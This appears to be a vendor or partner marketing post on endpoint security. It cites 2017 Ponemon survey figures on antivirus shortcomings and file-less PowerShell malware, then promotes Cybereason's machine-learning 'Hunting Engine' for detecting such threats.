Employees today are increasingly likely to work from outside the office, employing a variety of endpoint devices — smartphones, laptops, tablets, desktops and more — to complete business tasks. Various surveys indicate that the average U.S. employee uses at least three devices per day for work activities. For all their productivity and collaboration benefits, these devices create multiple avenues for introducing viruses, worms and other malware into an organization.
According to a recent survey by the Ponemon Institute, organizations of all shapes and sizes report they are struggling to manage and secure the ever-increasing number of endpoint devices being used in the workplace. Seventy percent of those surveyed for the firm’s 2017 State of Endpoint Security Risk Report say the risk is increasing.
Traditional antivirus solutions have become inadequate to address emerging threats such as file-less malware, PowerShell attacks and destructive ransomware. According to the Ponemon study, 50 percent of businesses with antivirus were compromised in 2017, with these attacks costing an average of $301 per employee.
In addition to being ineffective, traditional endpoint security measures are difficult and costly to manage. The study found that more than half of all endpoint security alerts are false positives, resulting in companies wasting an average of 425 hours a week investigating the alerts at an average annual cost of $1.37 million.
File-less malware attacks are particularly troublesome for antivirus software. Also known as zero-footprint attacks, file-less malware doesn't install code on a device. Instead, they use tiny but malicious PowerShell scripts that are stored in memory or in the registry. They perform reconnaissance, collect sensitive information, and then disappear without a trace when the infected computer is rebooted. According to the Ponemon report, 77 percent of attacks in 2017 were file-less attacks, which are 10 times more likely to succeed than file-based attacks.
Analytic engines powered by machine learning (ML) are emerging as powerful tools for discovering file-less malware and other subtle threats that lack the usual clues and artifacts of an infection. Unlike traditional signature-based tools that rely on known virus definitions, ML-based tools “learn” what malicious files looks like based on a variety of traits. This enables them to find zero-footprint malware with far greater speed and accuracy.
For this reason, we have begun working with many of our customers to implement Cybereason’s analytics-driven endpoint security solution to deal with these new, sophisticated threats. The solution ranks near the top of Gartner’s Peer Insights in the Endpoint Detection & Response Solutions market with an overall rating of 4.7 out of 5.0.
Cybereason’s solution is powered by a proprietary data analytics engine known as the “Hunting Engine.” It continually monitors every endpoint on the network through an interrogation process, asking 8 million questions per second. The Hunting Engine remembers and relates all this data, using it to connect seemingly unrelated or benign events to reveal malicious activity.
The rise of mobile and cloud computing have contributed to an exponential increase in the number of devices being used to conduct business. Organizations must take steps to secure those devices, but traditional signature-based antivirus tools are no match for an emerging class of stealth threats. With their ability to rapidly examine endpoint data to identify malicious patterns, analytics-driven solutions such as Cybereason are becoming essential to endpoint security.